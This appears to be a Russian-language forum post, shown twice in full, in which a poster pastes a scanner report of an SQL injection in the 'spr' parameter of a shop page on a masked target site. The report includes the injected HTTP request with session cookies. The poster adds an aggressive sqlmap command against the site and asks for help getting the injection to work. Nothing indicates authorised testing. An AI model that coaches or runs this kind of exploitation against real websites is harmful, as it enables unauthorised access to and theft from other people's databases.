Пожалуйста, обратите внимание, что пользователь заблокирован
Приветствую смотрите мапа не раскручивает инж
The vulnerability affects
https://target.com//shop_landwahl_modal.php , spr
Discovered by SQL injection
Attack Details
arrow_drop_up
URL encoded GET input spr was set to 1'"
Error message found:
You have an error in your SQL syntax
GET /shop_landwahl_modal.php?spr=1'" HTTP/1.1
Referer: https://target.com/
Cookie: flexxtrsid=rgd9sdpqit2ahu9b3nb07ufpr3;FlexxTradeuserSID=b36ad43f-dc24-7c44-653f-d6f688e6b27e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: https://target.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
sqlmap -u "https://target.com/360viewer/index.php?artnr=16123&spr=1" -p spr --random-agent --batch --level=5 --risk 3 --dbms=MySQL
прошу дать совет по этому поводу
The vulnerability affects
https://target.com//shop_landwahl_modal.php , spr
Discovered by SQL injection
Attack Details
arrow_drop_up
URL encoded GET input spr was set to 1'"
Error message found:
You have an error in your SQL syntax
GET /shop_landwahl_modal.php?spr=1'" HTTP/1.1
Referer: https://target.com/
Cookie: flexxtrsid=rgd9sdpqit2ahu9b3nb07ufpr3;FlexxTradeuserSID=b36ad43f-dc24-7c44-653f-d6f688e6b27e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: https://target.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
sqlmap -u "https://target.com/360viewer/index.php?artnr=16123&spr=1" -p spr --random-agent --batch --level=5 --risk 3 --dbms=MySQL
прошу дать совет по этому поводу
